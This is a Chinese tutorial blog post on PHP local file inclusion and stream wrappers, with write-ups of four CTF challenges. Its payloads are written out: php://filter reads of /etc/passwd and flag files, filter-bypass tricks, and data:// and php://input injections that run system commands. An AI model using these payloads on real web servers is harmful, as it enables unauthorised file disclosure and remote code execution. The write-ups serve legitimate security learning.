本地文件包含漏洞详解与CTF实战
1. 本地文件包含简介
1.1 本地文件包含定义
本地文件包含是一种Web应用程序漏洞,攻击者通过操控文件路径参数,使得服务器端包含了非预期的文件,从而可能导致敏感信息泄露。
常见的攻击方式包括:
- 包含配置文件、日志文件等敏感信息文件,导致信息泄露。
- 包含某些可执行文件或利用文件上传功能生成的恶意文件,进而执行任意代码。
示例:
<?php
$file = $_GET['file'];
include($file);
?>
1.2 php伪协议
PHP 伪协议允许开发者通过指定不同的输入源来读取、处理和引入数据,这一特性在文件包含漏洞(如 include 或 require)中被滥用,导致攻击者能够通过伪协议来读取敏感数据或执行恶意代码。
以下是在文件包含漏洞中常用的伪协议。
php://input:- 攻击者可以通过伪协议
php://input读取 POST 数据并将其作为包含文件的内容。这允许攻击者上传或注入恶意代码,导致代码执行。 - 用法:
?file=php://input+post包
- 攻击者可以通过伪协议
php://filter:- 通过
php://filter伪协议,攻击者可以将目标文件的内容以编码的形式返回,这使得攻击者可以读取敏感文件的内容(如配置文件)。 - 用法
?file=php://filter/[参数+过滤器]/resource=[target_file] - 示例:
如果用户传入file=php://filter/read=convert.base64-encode/resource=/etc/passwd,服务器会返回/etc/passwd文件的 base64 编码内容,攻击者可以解码并查看文件。
- 通过
data://:- 攻击者可以使用
data://伪协议注入任意代码并执行。例如: - 示例:
攻击者可以通过传入file=data:text/plain,<?php system('ls'); ?>,让 PHP 执行ls命令。
php伪协议的更详细内容参考php伪协议总结
- 攻击者可以使用
2.CTF实战
本文靶场全部来源于攻防世界
2.1 file_include
1. 题目&分析
highlight_file(__FILE__);的作用是将当前文件的源码(包括文件包含的的内容)以高亮的形式展示,因此我们才能利用这个漏洞。
本题包含了一个check.php,从字面上暗示了会对我们传入的参数进行一定过滤
本题用get方式接收了参数filename,并对文件进行包含,我们可以通过伪协议进行文件读取

2. 解法
本题的过滤非常的严格,而且由于check.php的内容是不知道的,只能不断尝试
php://input 无回显
/?filename=php://input
post:<?php phpinfo();?>
data:// 无回显
/?filename=data:text/plain,<?php phpinfo();?>
php://filter
/?filename=php://filter/read=convert.base64-encode/resource=flag.php
尝试上方代码显示do not hack!,尝试后发现read与base64-encode被过滤了:read可以直接省略,当参数缺省时默认为read;而后者需要替换其他的过滤器
php://filter/convert.base64-encode/resource=flag.php
php://filter/convert.quoted-printable-encode/resource=flag.php
php://filter/string.rot13/resource=flag.php
php://filter/string.toupper/resource=flag.php
php://filter/string.tolower/resource=flag.php
php://filter/string.strip_tags/resource=flag.php
又尝试使用了多个过滤器,发现都显示do not hack!被过滤了。
实际上,本题考察的是下方这个比较冷门的过滤器
?filename=php://filter/convert.iconv.UTF8.UTF16/resource=flag.php
得到flag

3. 小结
本题主要考察了php://filter的用法,尤其是对参数与过滤器的了解。
2.2 fileclude
1. 题目&分析
本题通过get方式接受两个参数file1与file2
本题对file1进行包含,此处可以通过伪协议去包含flag.php
本题会读取文件file2的内容并与hello ctf比较,需要注意的是,如果我们直接传入file2=hello ctf,file_get_contents函数会去读取hello ctf这个文件,这显然无法得到任何内容。要想满足该if条件,必须通过伪协议将字符串传输给file2,这样PHP 会将字符串 "hello ctf" 作为文件内容进行比较。

2 解法
本题解法就比较简单了,file1通过php://filter读取flag,file2通过data://输入hello ctf。注意最后得到的字符串需要Base64解码,就是flag了
/?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=data://text/plain,hello ctf
3. 小结
本题难点在于正确认识file_get_contents函数的性质,从而选择data://输入hello ctf
此外,值得一提的是,使用某些过滤器读取flag出现了报错的现象,这是由于其编码过程破坏了php的语法,使得PHP 解析器无法识别这些字符串。一般来说,使用 Base64 是不出出现这种编码问题的,因为 Base64 是一种可以将二进制数据安全编码为 ASCII 字符的方式,不会对 PHP 代码造成语法错误。不妨只有当Base64被过滤的情况下,再去考虑尝试其他的过滤器。
2.3 fileinclude
1. 题目&分析
页面中给出了两个提示
文件的路径为/var/www/html/,暗示利用伪协议读取的时候需要输入完整路径,而非像之前一样直接包含即可
flag文件的名字叫flag.php

按F12查看网页源代码,给出新的提示。本题在cookie处接受一个language参数,赋值给lan与.php拼接后被文件包含,最后文件内容随着index.php被输出前端。

2. 解题
利用hackbar添加cookie,内容如下。得到字符串后需要Base64解码。
language=php://filter/convert.base64-encode/resource=/var/www/html/flag

3. 小结
本题与之前的不同之处有两点
- 传参使用的是cookie,而非get。推广出去,get、post、cookie都有可能成为提交的方式。
- 本题的包含要求了具体的路径,之前的题目可能是因为设置了
include_path使得include直接包含了flag.php
2.4 Web_php_include
1. 题目&分析
本题存在两个get方式接受的参数,但是hello参数被接收后既没有被包含,也不参与条件的判断,认为在本题中不起作用,不过他显然会引起xss漏洞,此处不作详解。
对于page参数,通过strstr函数对php://进行了过滤。

2. 解法一 PHP大写绕过
考虑到php是大小写不敏感的,但是strstr函数是大小写敏感的,可以通过大写PHP://来绕过过滤。
尝试下方语句后发现flag未正常回显,猜测flag所在的文件名并不是flag.php
/?page=PHP://filter/read=convert.base64-encode/resource=flag.php
尝试用PHP://input写入php代码读取
/?page=PHP://input
<?php system("ls -lah")?> //查看当前目录下所有文件
<?php system("tac fl4gisisish3r3.php")?> //读取上一步看到的flag文件
3. 解法二 data://执行命令
直接利用data://执行命令得到flag
?page=data://text/plain,<?php system("ls")?>
?page=data://text/plain,<?php system("tac fl4gisisish3r3.php")?>
值得一提的是,如果对写入内容有过滤的话,可以对写入内容进行Base64编码,此处不需要进行编码,直接做即可。
/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJscyIp
4. 小结
本题与之前不同的是flag的文件名称为fl4gisisish3r3.php,这导致了不可能通过直接读取的方式获取flag,而必须要通过命令执行的方式来找到其名称。
宇宙安全声明
本博客所提供的内容仅供学习与交流,旨在提高网络安全技术水平,谨遵守国家相关法律法规,请勿用于违法用途,博主不对任何人因使用博客中提到的技术或工具而产生的任何后果负责。如果您对文章内容有疑问,可以留言私信。
本地文件包含漏洞详解与CTF实战的更多相关文章
- Nagios Looking Glass 本地文件包含漏洞
漏洞名称: Nagios Looking Glass 本地文件包含漏洞 CNNVD编号: CNNVD-201310-682 发布时间: 2013-10-31 更新时间: 2013-10-31 危害等级 ...
- WP e-Commerce WordPress Payment Gateways Caller插件本地文件包含漏洞
漏洞名称: WP e-Commerce WordPress Payment Gateways Caller插件本地文件包含漏洞 CNNVD编号: CNNVD-201310-642 发布时间: 2013 ...
- phpMyAdmin 4.8.x 本地文件包含漏洞利用
phpMyAdmin 4.8.x 本地文件包含漏洞利用 今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell.该漏洞利用 ...
- 易酷 cms2.5 本地文件包含漏洞 getshell
易酷 cms2.5 本地文件包含漏洞 getshell 首先下载源码安装(http://127.0.0.1/test/ekucms2.5/install.php) 安装成功直接进行复现吧 本地包含一 ...
- 关于Discuz! X系列UC_Server 本地文件包含漏洞
最近又发现discuz论坛被挂马了,决定好好研究一下discuz的漏洞,技术债始终要还是要还的 一.问题发现 快要睡觉的时候,突然收到一封邮件,发现服务器上的文件被篡改了,立即登录服务器,清空恶意文件 ...
- phpMyAdmin本地文件包含漏洞
4 phpMyAdmin本地文件包含漏洞 4.1 摘要 4.1.1 漏洞简介 phpMyAdmin是一个web端通用MySQL管理工具,上述版本在/libraries/gis/pma_gis_fact ...
- Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246)
不久前Elasticsearch发布了最新安全公告, Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本中的Console插件存在严重的本地文件包含漏洞可导致拒绝服务攻 ...
- WEB-文件包含漏洞详解
title date tags layout 文件包含漏洞(File Include) 2018-10-12 post 产生原因: 由于在编写代码时避免麻烦就需要把公用的一段代码写到一个单独的文件里面 ...
- 易酷CMS2.5本地文件包含漏洞复现
易酷CMS是一款影片播放CMS.该CMS2.5版本存在本地文件包含漏洞.我们可以利用这个漏洞,让其包含日志文件,然后再利用报错信息将一句话木马写入日志中.然后利用文件包含漏洞包含该日志文件,再用菜刀连 ...
- 组合拳 | 本地文件包含漏洞+TFTP=Getshell
文章声明 安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作. 本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转 ...
随机推荐
- 什么是状态机?用C语言实现进程5状态模型
前言 状态机在实际工作开发中应用非常广泛,在刚进入公司的时候,根据公司产品做流程图的时候,发现自己经常会漏了这样或那样的状态,导致整体流程会有问题,后来知道了状态机这样的东西,发现用这幅图就可以很清晰 ...
- LaTeX cleveref 宏包用法
介绍 cleveref 宏包是 LaTeX 中用于增强交叉引用功能的一个强大工具.它的主要特点是能够自动地按照不同元素的类型(如章节.图表等)生成格式化的引用,同时还支持定制引用格式,提供了比 LaT ...
- 工程化Vue使用
目录 环境准备 Vue项目-创建 Vue项目开发流程 API风格 案例 推荐阅读: VUE-局部使用 环境准备 介绍:create-vue是Vue官方提供的最新的脚手架工具,用于快速生成一个工程化的V ...
- .NET 8.0 前后分离快速开发框架
前言 大家好,推荐一个.NET 8.0 为核心,结合前端 Vue 框架,实现了前后端完全分离的设计理念.它不仅提供了强大的基础功能支持,如权限管理.代码生成器等,还通过采用主流技术和最佳实践,显著降低 ...
- Serilog文档翻译系列(四) - 结构化数据
Serilog 是一种序列化器.在许多情况下,它具有良好的默认行为,能够满足其目的,但有时也需要指示 Serilog 如何存储附加到日志事件上的属性. Serilog 使用一些不寻常的术语来指代 .N ...
- CSS & JS Effect – Textarea Autoresize
前言 这是一个很普遍的体验, 而且实现起来也很简单哦 参考 YouTube – How to Auto Resize Textarea using HTML CSS & JavaScript ...
- 使用pxe安装ARM服务器(鲲鹏920)遇到的坑
一.关于PXE获取到IP之后无ACK,无法获取引导文件. 目前ARM服务器基本都是使用UEFI的方式进行引导,我们只需要关注EFI方式引导即可,Legacy引导已经随着时代的发展被扫进历史的垃圾桶. ...
- 《HelloGitHub》第 102 期
兴趣是最好的老师,HelloGitHub 让你对编程感兴趣! 简介 HelloGitHub 分享 GitHub 上有趣.入门级的开源项目. github.com/521xueweihan/HelloG ...
- Sqoop简介安装及使用
Sqoop简介 sqoop 是 apache 旗下一款"Hadoop 和关系数据库服务器之间传送数据"的工具. 核心的功能有两个: 导入.迁入 导出.迁出 导入数据:MySQL,O ...
- Windows 笔记本 WiFi 功能消失问题解决
背景说明 许多 Windows 笔记本用户可能会遇到 WiFi 功能突然消失的问题.虽然网上有各种说法,但实际上,这个问题通常并非由病毒引起.大多数情况下,问题的根源是驱动程序丢失或笔记本静电干扰导致 ...